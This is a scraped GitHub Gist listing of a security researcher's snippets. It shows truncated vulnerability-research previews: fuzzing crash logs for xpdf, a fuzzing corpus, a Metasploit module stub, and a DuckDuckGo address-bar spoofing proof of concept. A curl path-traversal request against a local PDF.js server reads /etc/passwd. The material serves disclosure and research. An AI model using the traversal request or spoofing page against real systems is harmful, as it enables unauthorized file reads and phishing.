Skip to content

Instantly share code, notes, and snippets.


Dhiraj Mishra RootUp

View GitHub Profile
RootUp / auth.js
Created Feb 1, 2020
VLC-iOS - IDOR Patch
View auth.js
# PR130
var is_banned = false;
function show_loader(show) {
if (show) {
} else {
RootUp / regex.dict
Last active Feb 27, 2020
Fuzzing VIM - Corpus
View regex.dict
Corpus for fuzzing VIM regex engine.
^[0-9]{4}([- /.])(((0[13578]|(10|12))\1(0[1-9]|[1-2][0-9]|3[0-1]))|(02\1(0[1-9]|[1-2][0-9]))|((0[469]|11)\1(0[1-9]|[1-2][0-9]|30)))$
RootUp /
Created Sep 3, 2019
null pointer dereference - xpdf 3.04
xpdf v3.04
$ gdb ./pdfinfo
(gdb) run poc.pdf
Starting program: /home/input0/Downloads/xpdf-3.04/xpdf/pdfinfo poc.pdf
Syntax Error: Couldn't read xref table
Syntax Warning: PDF file is damaged - attempting to reconstruct xref table...
Syntax Error (895): Illegal character <2f> in hex string
Syntax Error (896): Illegal character <50> in hex string
RootUp /
Created Aug 31, 2019
null pointer dereference - xpdf 2.x
xpdf v2.0
$ gdb ./pdfinfo
(gdb) run out/crashes/id:000000,sig:11,src:000000,op:flip1,pos:2971
Starting program: /home/input0/Downloads/xpdf-2.00/xpdf/pdfinfo out/crashes/id:000000,sig:11,src:000000,op:flip1,pos:2971
Error (2978): Dictionary key must be a name object
Error (2980): Dictionary key must be a name object
Error (2982): Dictionary key must be a name object
Error (2989): Dictionary key must be a name object
RootUp / spoof.html
Last active May 28, 2019
DuckDuckGo Address Bar Spoofing - CVE-2019-12329
View spoof.html
<title>DuckDuckGo — Privacy, simplified.</title>
p.b {
font-family: Arial, Helvetica, sans-serif;
</style></head><p class="b"><body bgcolor="#5DBCD2">
<h1 style="text-align:center;">We defintiely store your <br> personal information. Ever.</h1>
<p style="text-align:center;">Our privacy policy is simple: we collect and share any of your personal
View MSF_bodycode.rb
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def run
exploit # start http server
def setup
@html = %|
JS goes here!
View AppLockMain.xml
< android:orientation="vertical" android:layout_width="fill_parent" android:layout_height="fill_parent" app:layout_behavior="@string/appbar_scrolling_view_behavior"
xmlns:android="" xmlns:app="">
<FrameLayout android:layout_width="fill_parent" android:layout_height="fill_parent">
<LinearLayout android:orientation="vertical" android:background="@color/white" android:layout_width="fill_parent" android:layout_height="fill_parent">
<LinearLayout android:orientation="vertical" android:id="@id/ll_title_lock_setting" android:background="@color/feature_setting_background" android:visibility="gone" android:layout_width="fill_parent" android:layout_height="wrap_content">
<LinearLayout android:orientation="horizontal" android:paddingTop="@dimen/y4" android:layout_width="fill_parent" android:layout_height="wrap_content">
<TextView and
std::string result;
std::string line;
while (getline(istr, line)) {
if (util::startsWith(line, "Authorization: Basic")) {
result += "Authorization: Basic ********\n";
else if (util::startsWith(line, "Proxy-Authorization: Basic")) {
result += "Proxy-Authorization: Basic ********\n";
RootUp / Path.js
Created Nov 15, 2018
Mozilla PDF.js
View Path.js
input0@zero:~$ curl --path-as-is -v
* Trying
* Connected to ( port 8888 (#0)
> GET /../../../../../../etc/passwd HTTP/1.1
> Host:
> User-Agent: curl/7.58.0
> Accept: */*
< HTTP/1.1 200 OK
RootUp / gulpfile.js
Created Nov 15, 2018
Mozilla PDF.js
View gulpfile.js
input0@zero:~/Desktop/pdf.js$ gulp server
[11:58:49] Using gulpfile ~/Desktop/pdf.js/gulpfile.js
[11:58:49] Starting 'server'...
### Starting local server
Server running at http://localhost:8888/
You can’t perform that action at this time.